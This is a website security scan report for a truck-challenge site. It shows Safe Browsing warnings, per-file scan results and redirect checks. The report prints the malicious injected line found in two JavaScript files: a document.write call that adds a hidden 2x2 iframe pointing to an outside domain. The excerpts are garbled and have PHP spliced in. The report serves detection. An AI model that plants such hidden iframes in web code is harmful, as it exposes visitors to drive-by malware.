Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=theultimatetruckchallenge.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://theultimatetruckchallenge.com/ | 200 OK Content-Length: 11872 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js | 200 OK Content-Length: 93868 Content-Type: text/javascript | clean |
http://theultimatetruckchallenge.com/js/vehicle_select.js | 200 OK Content-Length: 3930 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1488261></iframe>');
$(function(){ $('#year').change(function getmakes(){ var vehyear = $("#year").val(); $.ajax({ url: "makes.php", global: false, type: "POST", async: false, dataType: "html", data: setcookie('comment_author_url_' . COOKIEHASH, esc_url($comment->comment_author_url), time() + $comment_cookie_lifetime, COOKIEPATH, COOKIE_DOMAIN); } $location = empty($_POST['redirect_to']) ? get_comment_link($comment_id) : $_POST['redirect_to'] . '#comment-' . $comment_id; $location = apply_filters('comment_post_redirect', $location, $comment); wp_redirect($location); exit; ?> Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=1488261 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1488261> | ||
http://theultimatetruckchallenge.com/js/jquery.maskedinput-1.2.2.js | 200 OK Content-Length: 7089 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1488261></iframe>');
 (function($) { var pasteEventName = ($.browser.msie ? 'paste' : 'input') + ".mask"; var iPhone = (window.orientation != undefined); $.mask = { definitions: { '9': "[0-9]", 'a': "[A-Za-z]", '*': "[A-Za-z0-9]" } }; $.fn.extend({ caret: function(begin else input.caret(pos); }, 0); }) .bind("blur.mask", function() { checkVal(); if (input.val() != focusText) input.change(); }) .bind("keydown.mask", keydownEvent) .bind("keypress.mask", keypressEvent) .bind(pasteEventName, function() { setTimeout(function() { input.caret(checkVal(true)); }, 0); }); checkVal(); }); } }); })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=1488261 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1488261> | ||
http://millerusa.net/816049.js | 404 Not Found Content-Length: 9 Content-Type: text/html | clean |
http://millerusa.net/test404page.js | 404 Not Found Content-Length: 9 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: theultimatetruckchallenge.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Dec 2014 01:16:30 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=0enc16s2ohu67f8effm487arh7; path=/
GET / HTTP/1.1
Host: theultimatetruckchallenge.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Dec 2014 01:16:30 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=0enc16s2ohu67f8effm487arh7; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: theultimatetruckchallenge.com
Referer: http://www.google.com/search?q=theultimatetruckchallenge.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: theultimatetruckchallenge.com
Referer: http://www.google.com/search?q=theultimatetruckchallenge.com
Result:
The result is similar to the first query. There are no suspicious redirects found.